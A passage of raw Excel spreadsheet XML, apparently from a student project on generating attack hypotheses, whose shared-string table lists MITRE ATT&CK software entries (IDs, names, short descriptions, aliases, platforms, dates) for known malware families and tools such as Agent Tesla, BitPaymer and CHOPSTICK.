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elisabethgoebel/Documents/Studium/Teamprojekt/attack-hypotheses-generation/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{7BAF800A-419A-7142-823B-690D79ECF3CE}" xr6:coauthVersionLast="46" xr6:coauthVersionMax="46" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="28800" windowHeight="18000" activeTab="1" xr2:uid="{0783DD46-AD66-FE43-A147-B937F31AB547}"/>
  </bookViews>
  <sheets>
    <sheet name="Software" sheetId="1" r:id="rId1"/>
    <sheet name="Techniques" sheetId="2" r:id="rId2"/>
    <sheet name="Association" sheetId="3" r:id="rId3"/>
    <sheet name="Association_compact" sheetId="7" r:id="rId4"/>
    <sheet name="Vektordarstellung" sheetId="5" r:id="rId5"/>
    <sheet name="Test" sheetId="8"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8" l="1"/>
  <c r="E3" i="8" s="1"/>
  <c r="E4" i="8" s="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="69628" uniqueCount="11607">
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>created</t>
  </si>
  <si>
    <t>last modified</t>
  </si>
  <si>
    <t>version</t>
  </si>
  <si>
    <t>platforms</t>
  </si>
  <si>
    <t>aliases</t>
  </si>
  <si>
    <t>type</t>
  </si>
  <si>
    <t>contributors</t>
  </si>
  <si>
    <t>S0066</t>
  </si>
  <si>
    <t>3PARA RAT</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024). (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0066</t>
  </si>
  <si>
    <t>31 May 2017</t>
  </si>
  <si>
    <t>30 March 2020</t>
  </si>
  <si>
    <t>1.1</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>malware</t>
  </si>
  <si>
    <t>S0065</t>
  </si>
  <si>
    <t>4H RAT</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) is malware that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024) since at least 2007. (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0065</t>
  </si>
  <si>
    <t>S0469</t>
  </si>
  <si>
    <t>ABK</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0469</t>
  </si>
  <si>
    <t>10 June 2020</t>
  </si>
  <si>
    <t>24 June 2020</t>
  </si>
  <si>
    <t>1.0</t>
  </si>
  <si>
    <t>S0045</t>
  </si>
  <si>
    <t>ADVSTORESHELL</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is a spying backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0045</t>
  </si>
  <si>
    <t>AZZY, EVILTOSS, NETUI, Sedreco</t>
  </si>
  <si>
    <t>S0073</t>
  </si>
  <si>
    <t>ASPXSpy</t>
  </si>
  <si>
    <t>[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. It has been modified by [Threat Group-3390](https://attack.mitre.org/groups/G0027) actors to create the ASPXTool version. (Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0073</t>
  </si>
  <si>
    <t>ASPXTool</t>
  </si>
  <si>
    <t>S0552</t>
  </si>
  <si>
    <t>AdFind</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0552</t>
  </si>
  <si>
    <t>28 December 2020</t>
  </si>
  <si>
    <t>29 December 2020</t>
  </si>
  <si>
    <t>tool</t>
  </si>
  <si>
    <t>S0331</t>
  </si>
  <si>
    <t>Agent Tesla</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written for the .NET framework that has been observed since at least 2014.(Citation: Fortinet Agent Tesla April 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0331</t>
  </si>
  <si>
    <t>29 January 2019</t>
  </si>
  <si>
    <t>21 April 2021</t>
  </si>
  <si>
    <t>1.2</t>
  </si>
  <si>
    <t>S0092</t>
  </si>
  <si>
    <t>Agent.btz</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. (Citation: Securelist Agent.btz)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0092</t>
  </si>
  <si>
    <t>S0504</t>
  </si>
  <si>
    <t>Anchor</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://attack.mitre.org/software/S0266) on selected high profile targets since at least 2018.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0504</t>
  </si>
  <si>
    <t>10 September 2020</t>
  </si>
  <si>
    <t>05 October 2020</t>
  </si>
  <si>
    <t>Linux, Windows</t>
  </si>
  <si>
    <t>Anchor_DNS</t>
  </si>
  <si>
    <t>Cybereason Nocturnus, @nocturnus</t>
  </si>
  <si>
    <t>S0584</t>
  </si>
  <si>
    <t>AppleJeus</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. [AppleJeus](https://attack.mitre.org/software/S0584) has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032), targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. [AppleJeus](https://attack.mitre.org/software/S0584) has been used to distribute the [FALLCHILL](https://attack.mitre.org/software/S0181) RAT.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0584</t>
  </si>
  <si>
    <t>01 March 2021</t>
  </si>
  <si>
    <t>27 April 2021</t>
  </si>
  <si>
    <t>Windows, macOS</t>
  </si>
  <si>
    <t>S0456</t>
  </si>
  <si>
    <t>Aria-body</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) is a custom backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019).(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0456</t>
  </si>
  <si>
    <t>26 May 2020</t>
  </si>
  <si>
    <t>03 July 2020</t>
  </si>
  <si>
    <t>S0099</t>
  </si>
  <si>
    <t>Arp</t>
  </si>
  <si>
    <t>[Arp](https://attack.mitre.org/software/S0099) displays information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0099</t>
  </si>
  <si>
    <t>17 October 2018</t>
  </si>
  <si>
    <t>Linux, Windows, macOS</t>
  </si>
  <si>
    <t>arp.exe</t>
  </si>
  <si>
    <t>S0373</t>
  </si>
  <si>
    <t>Astaroth</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. (Citation: Cybereason Astaroth Feb 2019)(Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0373</t>
  </si>
  <si>
    <t>17 April 2019</t>
  </si>
  <si>
    <t>08 December 2020</t>
  </si>
  <si>
    <t>2.0</t>
  </si>
  <si>
    <t>Guildma</t>
  </si>
  <si>
    <t>Carlos Borges, @huntingneo, CIP</t>
  </si>
  <si>
    <t>S0438</t>
  </si>
  <si>
    <t>Attor</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) is a Windows-based espionage platform that has been seen in use since 2013. [Attor](https://attack.mitre.org/software/S0438) has a loadable plugin architecture to customize functionality for specific targets.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0438</t>
  </si>
  <si>
    <t>06 May 2020</t>
  </si>
  <si>
    <t>07 July 2020</t>
  </si>
  <si>
    <t>ESET</t>
  </si>
  <si>
    <t>S0347</t>
  </si>
  <si>
    <t>AuditCred</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) is a malicious DLL that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) during their 2018 attacks.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0347</t>
  </si>
  <si>
    <t>30 January 2019</t>
  </si>
  <si>
    <t>Roptimizer</t>
  </si>
  <si>
    <t>S0129</t>
  </si>
  <si>
    <t>AutoIt backdoor</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. (Citation: Forcepoint Monsoon) This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0129</t>
  </si>
  <si>
    <t>S0473</t>
  </si>
  <si>
    <t>Avenger</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0473</t>
  </si>
  <si>
    <t>11 June 2020</t>
  </si>
  <si>
    <t>S0344</t>
  </si>
  <si>
    <t>Azorult</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016.
In July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0344</t>
  </si>
  <si>
    <t>S0031</t>
  </si>
  <si>
    <t>BACKSPACE</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) is a backdoor used by [APT30](https://attack.mitre.org/groups/G0013) that dates back to at least 2005. (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0031</t>
  </si>
  <si>
    <t>Lecna</t>
  </si>
  <si>
    <t>S0245</t>
  </si>
  <si>
    <t>BADCALL</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) is a Trojan malware variant used by the group [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0245</t>
  </si>
  <si>
    <t>S0128</t>
  </si>
  <si>
    <t>BADNEWS</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is malware that has been used by the actors responsible for the [Patchwork](https://attack.mitre.org/groups/G0040) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. (Citation: Forcepoint Monsoon) (Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0128</t>
  </si>
  <si>
    <t>21 October 2020</t>
  </si>
  <si>
    <t>S0470</t>
  </si>
  <si>
    <t>BBK</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0470</t>
  </si>
  <si>
    <t>S0127</t>
  </si>
  <si>
    <t>BBSRAT</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) is malware with remote access tool functionality that has been used in targeted compromises. (Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0127</t>
  </si>
  <si>
    <t>S0017</t>
  </si>
  <si>
    <t>BISCUIT</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) is a backdoor that has been used by [APT1](https://attack.mitre.org/groups/G0006) since as early as 2007. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0017</t>
  </si>
  <si>
    <t>S0190</t>
  </si>
  <si>
    <t>BITSAdmin</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0190</t>
  </si>
  <si>
    <t>18 April 2018</t>
  </si>
  <si>
    <t>20 March 2020</t>
  </si>
  <si>
    <t>Edward Millington</t>
  </si>
  <si>
    <t>S0069</t>
  </si>
  <si>
    <t>BLACKCOFFEE</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) is malware that has been used by several Chinese groups since at least 2013. (Citation: FireEye APT17) (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0069</t>
  </si>
  <si>
    <t>S0520</t>
  </si>
  <si>
    <t>BLINDINGCAN</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0520</t>
  </si>
  <si>
    <t>27 October 2020</t>
  </si>
  <si>
    <t>17 March 2021</t>
  </si>
  <si>
    <t>Daniyal Naeem, BT Security</t>
  </si>
  <si>
    <t>S0360</t>
  </si>
  <si>
    <t>BONDUPDATER</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0360</t>
  </si>
  <si>
    <t>18 February 2019</t>
  </si>
  <si>
    <t>09 February 2021</t>
  </si>
  <si>
    <t>S0415</t>
  </si>
  <si>
    <t>BOOSTWRITE</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) is a loader crafted to be launched via abuse of the DLL search order of applications used by [FIN7](https://attack.mitre.org/groups/G0046).(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0415</t>
  </si>
  <si>
    <t>11 October 2019</t>
  </si>
  <si>
    <t>15 October 2019</t>
  </si>
  <si>
    <t>S0114</t>
  </si>
  <si>
    <t>BOOTRASH</t>
  </si>
  <si>
    <t>[BOOTRASH](https://attack.mitre.org/software/S0114) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that targets Windows operating systems. It has been used by threat actors that target the financial sector.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0114</t>
  </si>
  <si>
    <t>Christopher Glyer, FireEye, @cglyer</t>
  </si>
  <si>
    <t>S0014</t>
  </si>
  <si>
    <t>BS2005</t>
  </si>
  <si>
    <t>[BS2005](https://attack.mitre.org/software/S0014) is malware that was used by [Ke3chang](https://attack.mitre.org/groups/G0004) in spearphishing campaigns since at least 2011. (Citation: Villeneuve et al 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0014</t>
  </si>
  <si>
    <t>S0043</t>
  </si>
  <si>
    <t>BUBBLEWRAP</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) is a full-featured, second-stage backdoor used by the [admin@338](https://attack.mitre.org/groups/G0018) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0043</t>
  </si>
  <si>
    <t>Backdoor.APT.FakeWinHTTPHelper</t>
  </si>
  <si>
    <t>S0414</t>
  </si>
  <si>
    <t>BabyShark</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. (Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0414</t>
  </si>
  <si>
    <t>07 October 2019</t>
  </si>
  <si>
    <t>12 March 2021</t>
  </si>
  <si>
    <t>S0475</t>
  </si>
  <si>
    <t>BackConfig</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) is a custom Trojan with a flexible plugin architecture that has been used by [Patchwork](https://attack.mitre.org/groups/G0040).(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0475</t>
  </si>
  <si>
    <t>17 June 2020</t>
  </si>
  <si>
    <t>29 June 2020</t>
  </si>
  <si>
    <t>S0093</t>
  </si>
  <si>
    <t>Backdoor.Oldrea</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a backdoor used by [Dragonfly](https://attack.mitre.org/groups/G0035). It appears to be custom malware authored by the group or specifically for it. (Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0093</t>
  </si>
  <si>
    <t>Havex</t>
  </si>
  <si>
    <t>S0337</t>
  </si>
  <si>
    <t>BadPatch</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0337</t>
  </si>
  <si>
    <t>17 March 2020</t>
  </si>
  <si>
    <t>S0234</t>
  </si>
  <si>
    <t>Bandook</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi, which has been available since roughly 2007  (Citation: EFF Manul Aug 2016) (Citation: Lookout Dark Caracal Jan 2018).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0234</t>
  </si>
  <si>
    <t>S0239</t>
  </si>
  <si>
    <t>Bankshot</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0239</t>
  </si>
  <si>
    <t>Trojan Manuscript</t>
  </si>
  <si>
    <t>S0534</t>
  </si>
  <si>
    <t>Bazar</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor malware in use since at least April 2020, with infections mainly targeting professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://attack.mitre.org/software/S0534) has been reported to have ties to [TrickBot](https://attack.mitre.org/software/S0266) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0534</t>
  </si>
  <si>
    <t>18 November 2020</t>
  </si>
  <si>
    <t>16 April 2021</t>
  </si>
  <si>
    <t>KEGTAP, Team9</t>
  </si>
  <si>
    <t>S0574</t>
  </si>
  <si>
    <t>BendyBear</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, [BendyBear](https://attack.mitre.org/software/S0574) shares a variety of features with [Waterbear](https://attack.mitre.org/software/S0579), malware previously attributed to the Chinese cyber espionage group [BlackTech](https://attack.mitre.org/groups/G0098).(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0574</t>
  </si>
  <si>
    <t>16 February 2021</t>
  </si>
  <si>
    <t>S0268</t>
  </si>
  <si>
    <t>Bisonal</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) is malware that has been used in attacks against targets in Russia, South Korea, and Japan. It has been observed in the wild since 2014. (Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0268</t>
  </si>
  <si>
    <t>S0570</t>
  </si>
  <si>
    <t>BitPaymer</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://attack.mitre.org/software/S0570) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://attack.mitre.org/software/S0570) has several indicators suggesting overlap with the [Dridex](https://attack.mitre.org/software/S0384) malware and is often delivered via [Dridex](https://attack.mitre.org/software/S0384).(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0570</t>
  </si>
  <si>
    <t>08 February 2021</t>
  </si>
  <si>
    <t>26 April 2021</t>
  </si>
  <si>
    <t>FriedEx, wp_encrypt</t>
  </si>
  <si>
    <t>S0089</t>
  </si>
  <si>
    <t>BlackEnergy</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0089</t>
  </si>
  <si>
    <t>1.3</t>
  </si>
  <si>
    <t>Black Energy</t>
  </si>
  <si>
    <t>S0564</t>
  </si>
  <si>
    <t>BlackMould</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) is a web shell based on [China Chopper](https://attack.mitre.org/software/S0020) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://attack.mitre.org/groups/G0093) against telecommunication providers.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0564</t>
  </si>
  <si>
    <t>14 January 2021</t>
  </si>
  <si>
    <t>23 March 2021</t>
  </si>
  <si>
    <t>S0521</t>
  </si>
  <si>
    <t>BloodHound</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.(Citation: GitHub Bloodhound)(Citation: CrowdStrike BloodHound April 2018)(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0521</t>
  </si>
  <si>
    <t>28 October 2020</t>
  </si>
  <si>
    <t>24 November 2020</t>
  </si>
  <si>
    <t>S0486</t>
  </si>
  <si>
    <t>Bonadan</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) is a malicious version of OpenSSH which acts as a custom backdoor. [Bonadan](https://attack.mitre.org/software/S0486) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0486</t>
  </si>
  <si>
    <t>16 July 2020</t>
  </si>
  <si>
    <t>10 August 2020</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>S0252</t>
  </si>
  <si>
    <t>Brave Prince</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://attack.mitre.org/software/S0249), and was seen along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations surrounding the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0252</t>
  </si>
  <si>
    <t>21 April 2020</t>
  </si>
  <si>
    <t>S0204</t>
  </si>
  <si>
    <t>Briba</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor and download files on to compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0204</t>
  </si>
  <si>
    <t>S0482</t>
  </si>
  <si>
    <t>Bundlore</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0482</t>
  </si>
  <si>
    <t>01 July 2020</t>
  </si>
  <si>
    <t>06 July 2020</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t>OSX.Bundlore</t>
  </si>
  <si>
    <t>S0025</t>
  </si>
  <si>
    <t>CALENDAR</t>
  </si>
  <si>
    <t>[CALENDAR](https://attack.mitre.org/software/S0025) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Gmail Calendar traffic. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0025</t>
  </si>
  <si>
    <t>S0465</t>
  </si>
  <si>
    <t>CARROTBALL</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0465</t>
  </si>
  <si>
    <t>02 June 2020</t>
  </si>
  <si>
    <t>S0462</t>
  </si>
  <si>
    <t>CARROTBAT</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) is a customized dropper that has been in use since at least 2017. [CARROTBAT](https://attack.mitre.org/software/S0462) has been used to install [SYSCON](https://attack.mitre.org/software/S0464) and has infrastructure overlap with [KONNI](https://attack.mitre.org/software/S0356).(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0462</t>
  </si>
  <si>
    <t>15 June 2020</t>
  </si>
  <si>
    <t>S0222</t>
  </si>
  <si>
    <t>CCBkdr</t>
  </si>
  <si>
    <t>[CCBkdr](https://attack.mitre.org/software/S0222) is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website. (Citation: Talos CCleanup 2017) (Citation: Intezer Aurora Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0222</t>
  </si>
  <si>
    <t>S0023</t>
  </si>
  <si>
    <t>CHOPSTICK</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [X-Agent for Android](https://attack.mitre.org/software/S0314).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0023</t>
  </si>
  <si>
    <t>2.1</t>
  </si>
  <si>
    <t>Backdoor.SofacyX, SPLM, X-Agent, Xagent, webhp</t>
  </si>
  <si>
    <t>Richard Gold, Digital Shadows</t>
  </si>
  <si>
    <t>S0212</t>
  </si>
  <si>
    <t>CORALDECK</t>
  </si>
  <si>
